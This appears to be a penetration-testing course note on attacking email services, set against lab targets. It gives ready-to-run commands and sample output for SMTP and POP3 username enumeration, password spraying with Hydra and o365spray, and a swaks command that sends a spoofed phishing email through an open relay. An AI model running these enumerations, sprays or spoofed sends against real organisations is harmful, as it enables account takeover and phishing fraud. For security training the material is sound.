Email Services

Email servers are complex and usually require us to enumerate multiple servers, ports, and services. Furthermore, today most companies have their email services in the cloud with services such as Microsoft 365 or G-Suite. Therefore, our approach to attacking the email service depends on the service in use.

We can use the Mail eXchanger (MX) DNS record to identify a mail server

We can use tools such as host or dig and online websites such as MXToolbox to query information about the MX records:

host -t MX hackthebox.eu

dig mx plaintext.do | grep "MX" | grep -v ";"

host -t A mail1.inlanefreight.htb.

If we are targetting a custom mail server implementation such as inlanefreight.htb, we can enumerate the following ports:

Port

Service

TCP/25

SMTP Unencrypted

TCP/143

IMAP4 Unencrypted

TCP/110

POP3 Unencrypted

TCP/465

SMTP Encrypted

TCP/587

SMTP Encrypted/STARTTLS

TCP/993

IMAP4 Encrypted

TCP/995

POP3 Encrypted

We can use Nmap's default script -sC option to enumerate those ports on the target system:

sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 <IP>

Misconfigurations

Authentication

The SMTP server has different commands that can be used to enumerate valid usernames VRFY, EXPN, and RCPT TO. If we successfully enumerate valid usernames, we can attempt to password spray, brute-forcing, or guess a valid password. So let's explore how those commands work.

VRFY this command instructs the receiving SMTP server to check the validity of a particular email username. The server will respond, indicating if the user exists or not. This feature can be disabled.

telnet 10.10.110.20 25

Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)


VRFY root

252 2.0.0 root


VRFY www-data

252 2.0.0 www-data


VRFY new-user

550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table

EXPN is similar to VRFY, except that when used with a distribution list, it will list all users on that list. This can be a bigger problem than the VRFY command since sites often have an alias such as "all."

telnet 10.10.110.20 25

Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)


EXPN john

250 2.1.0 [email protected]


EXPN support-team

250 2.0.0 [email protected]
250 2.1.5 [email protected]

RCPT TO identifies the recipient of the email message. This command can be repeated multiple times for a given message to deliver a single message to multiple recipients.

telnet 10.10.110.20 25

Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)


MAIL FROM:[email protected]
it is
250 2.1.0 [email protected]... Sender ok


RCPT TO:julio

550 5.1.1 julio... User unknown


RCPT TO:kate

550 5.1.1 kate... User unknown


RCPT TO:john

250 2.1.5 john... Recipient ok

We can also use the POP3 protocol to enumerate users depending on the service implementation. For example, we can use the command USER followed by the username, and if the server responds OK. This means that the user exists on the server.

telnet 10.10.110.20 110

Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
+OK POP3 Server ready

USER julio

-ERR


USER john

+OK

Automatic enumeration

To automate our enumeration process, we can use a tool named smtp-user-enum. We can specify the enumeration mode with the argument -M followed by VRFY, EXPN, or RCPT, and the argument -U with a file containing the list of users we want to enumerate. Depending on the server implementation and enumeration mode, we need to add the domain for the email address with the argument -D. Finally, we specify the target with the argument -t.

smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t <IP>

Cloud Enumeration

O365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365)

Validating service

python3 o365spray.py --validate --domain msplaintext.xyz

Attempt to identify usernames.

python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz

Password Attacks

We can use Hydra to perform a password spray or brute force against email services such as SMTP, POP3, or IMAP4. First, we need to get a username list and a password list and specify which service we want to attack. Let us see an example for POP3.

hydra -L users.txt -p 'Company01!' -f <IP> pop3

For cloud services we can try custom tools such as o365spray or MailSniper for Microsoft Office 365 or CredKing for Gmail or Okta.

python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain <domain>

Protocol Specifics Attacks

An open relay is a Simple Mail Transfer Protocol (SMTP) server, which is improperly configured and allows an unauthenticated email relay.

Open Relay

From an attacker's standpoint, we can abuse this for phishing by sending emails as non-existing users or spoofing someone else's email.

With the nmap smtp-open-relay script, we can identify if an SMTP port allows an open relay.

nmap -p25 -Pn --script smtp-open-relay <IP>

Next, we can use any mail client to connect to the mail server and send our email.

swaks --from [email protected] --to [email protected] --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server <IP>

PreviousDNS NextPivoting, Tunneling, and Port Forwarding

Last updated 7 months ago